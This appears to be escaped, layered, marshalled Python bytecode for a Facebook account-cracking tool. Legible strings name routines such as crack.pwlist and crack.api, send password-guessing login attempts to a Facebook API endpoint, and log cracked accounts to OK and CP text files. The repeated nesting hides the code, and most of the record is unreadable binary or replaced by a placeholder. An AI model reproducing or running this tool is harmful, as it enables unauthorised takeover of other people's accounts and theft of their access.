00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xef\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x90\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s1\xd0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xd2\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02ss\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x14\xcf\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb5\xce\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sV\xce\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xf7\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x98\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s9\xcd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xda\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s{\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x1c\xcc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xbd\xcb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s^\xcb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xff\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa0\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sA\xca\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xe2\xc9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x83\xc9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s$\xc9\x00\x00\xe3\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc5\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sf\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x07\xc8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa8\xc7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sI\xc7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xea\xc6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x8b\xc6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s,\xc6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xcd\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sn\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x0f\xc5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb0\xc4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sQ\xc4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xf2\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x93\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s4\xc3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xd5\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sv\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x17\xc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xb8\xc1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sY\xc1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xfa\xc0\x00\x00\xe3\x00\x00\x00\x00\x00
[content omitted: the `content` field of this record is a non-text binary payload (escaped, marshalled CPython bytecode). It cannot be rendered as readable source text and is left as an opaque placeholder here.]
01t\x02t\x01t\x03t\x01f\x05\x16\x00\x83\x01}\x03|\x03d\x06v\x00r\xect\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00|\x03d\nv\x00\x90\x01r\tt\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x18|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00|\x03d\x0cv\x00\x90\x01r&t\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x19|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00|\x02d\x0ev\x00\x90\x01r\xact\x0bd\x0ft\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x02t\x01t\x03t\x01f\x05\x16\x00\x83\x01}\x03|\x03d\x06v\x00\x90\x01rct\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00|\x03d\nv\x00\x90\x01r\x80t\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x1a|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00|\x03d\x0cv\x00\x90\x01r\x9dt\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x1b|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00)\x10Nu \x00\x00\x00%s [%s\xe2\x80\xa2%s] %sENTER PASSWORD : r\xdf\x00\x00\x00r\x03\x00\x00\x00r`\x01\x00\x00rT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00u&\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sPOP UP CP OPTIONS [y/n]rb\x01\x00\x00\xe9\x1e\x00\x00\x00re\x01\x00\x00r_\x00\x00\x00r\x8d\x00\x00\x00ra\x01\x00\x00)\x1crk\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00r\xd6\x00\x00\x00r`\x01\x00\x00r\xc6\x00\x00\x00rj\x01\x00\x00ri\x01\x00\x00r\x14\x01\x00\x00rl\x01\x00\x00rP\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rx\x00\x00\x00rm\x01\x00\x00rn\x01\x00\x00ro\x01\x00\x00rp\x01\x00\x00rM\x00\x00\x00rq\x01\x00\x00rW\x01\x00\x00r}\x00\x00\x00r\xf8\x00\x00\x00rr\x01\x00\x00rs\x01\x00\x00rt\x01\x00\x00ru\x01\x00\x00)\x04rv\x01\x00\x00r\xa1\x00\x00\x00rx\x01\x00\x00ry\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rj\x01\x00\x00\xaf\x03\x00\x00s\x86\x00\x00\x00\x1c\x01\x0e\x01\x0c\x01\n\x02\x12\x01\x06\x01\x16\x01\x04\x01\x08\x01\x14\x01\n\x01\x08\x01\x14\x01\x16\x01\x08\x01\x14\x01\n\x01\x08\x01\x06\x01\x14\x01\x0c\x01\n\x01\x08\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\n\x01\x14\x01\x16\x01\x08\x01\x14\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\n\x01\x14\x01\x16\x01\n\x01\x14\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\x14\x02\n\x01z\x0ccrack.pwlistc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\x88\x02\x00\x00\x90\x01z7|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\x01}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x1
1d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\n\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\n|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\tt\nd\x16t\x14t\x0ct\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x15\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x17t\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\nq\x07|\x00\x04\x00j\x16d\x187\x00\x02\x00_\x16t\nd\x19t\x14t\x0ct\x14t\x0b|\x00j\x16t\x17|\x00j\x18\x83\x01t\x0bt\x0ct\x17|\x00j\x15\x83\x01t\x0bt\x0ct\x17|\x00j\x0e\x83\x01t\x0bt\x0cf\x0e\x16\x00d\x11d\x1a\x8d\x02\x01\x00t\x19j\x1a\xa0\x1b\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x1c|\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1bNr`\x01\x00\x00r\x87\x00\x00\x00\xfa\x1ahttps://b-api.facebook.comr\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00\xda\x08birthday\xfa\x01/\xf5%\x00\x00\x00\r%s [%sCP%s] %s \xe2\x80\xa2 %s \xe2\x80\xa2 %s %s %s%s\xf5\x10\x00\x00\x00%s\xe2\x80\xa2%s\xe2\x80\xa2%s%s%s\xfa\tCP/%s.txt\xfa\x02a+\xf5\x11\x00\x00\x00%s\xe2\x80\xa2%s\xe2\x80\xa2%s%s%s\nr\x8c\x00\x00\x00\xf5\x1d\x00\x00\x00\r%s [%sCP%s] %s \xe2\x80\xa2 %s%s \xf5\x07\x00\x00\x00%s\xe2\x80\xa2%s\xf5\x08\x00\x00\x00%s\xe2\x80\xa2%s\nr\xeb\x00\x00\x00\xf5\x1c\x00\x00\x00\r%s[%sOK%s] %s \xe2\x80\xa2 %s%s \xfa\tOK/%s.txtr!\x00\x00\x00\xfa2\r%s [%sCRACK%s]%s[%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s\xa9\x01\xda\x03end)\x1drq\x00\x00\x00r\xfa\x00\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00\xda\tbulan_ttlrP\x00\x00\x00rm\x00\x00\x00rl\x00\x00\x00r^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00\xda\x06tarikhr<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00r\xf8\x00\x00\x00\xa9\nrv\x01\x00\x00ri\x01\x00\x00r\xa1\x00\x00\x00\xda\x03log\xda\x02ke\xda\x02tt\xda\x03ttlr_\x01\x00\x00r\x91\x00\x00\x00r\x82\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\xf8\x00\x00\x00\xf8\x03\x00\x00sF\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01.\x01 
\x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01(\x01\x1a\x01"\x01\x06\x01\x10\x01(\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\tcrack.apic\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\x90\x02\x00\x00\x90\x01z;|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\x05}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\x0e\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x0e|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\rt\nd\x16t\x14t\x15t\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00t\nd\x17\x83\x01\x01\x00|\x00j\x16\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x18t\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x0eq\x07|\x00\x04\x00j\x17d\x197\x00\x02\x00_\x17t\nd\x1at\x14t\x15t\x14t\x0b|\x00j\x17t\x18|\x00j\x19\x83\x01t\x0bt\x15t\x18|\x00j\x16\x83\x01t\x0bt\x15t\x18|\x00j\x0e\x83\x01t\x0bt\x15f\x0e\x16\x00d\x11d\x1b\x8d\x02\x01\x00t\x1aj\x1b\xa0\x1c\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x1d|\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1cNr`\x01\x00\x00r\x87\x00\x00\x00r|\x01\x00\x00r\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00r}\x01\x00\x00r~\x01\x00\x00r\x7f\x01\x00\x00r\x80\x01\x00\x00r\x81\x01\x00\x00r\x82\x01\x00\x00r\x83\x01\x00\x00r\x8c\x00\x00\x00r\x84\x01\x00\x00r\x85\x01\x00\x00r\x86\x01\x00\x00r\xeb\x00\x00\x00r\x87\x01\x00\x00r%\x00\x00\x00r\x88\x01\x00\x00r!\x00\x00\x00r\x89\x01\x00\x00r\x8a\x01\x00\x00)\x1erq\x00\x00\x00r\xfa\x00\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00r\x8c\x01\x00\x00rP\x00\x00\x00rm\x00\x00\x00\xda\x01Kr^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00r\x8d\x01\x00\x00r<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00rp\x01\x00\x00r\x8e\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rp\x01\x00\x00\x1c\x04\x00\x00sH\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01.\x01 
\x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01(\x01\x1a\x01"\x01\x06\x01\x10\x01(\x01\x08\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\x0ecrack.api_opsic\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00\xf3\x9a\x02\x00\x00\x90\x01z@|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\n}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\x13\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x13|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\x12d\x16t\x14t\x15t\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01t\x15f\x07\x16\x00}\nt\x16|\nt\x17|\x03\xa0\x00d\x17\xa1\x01\x83\x01\x83\x02\x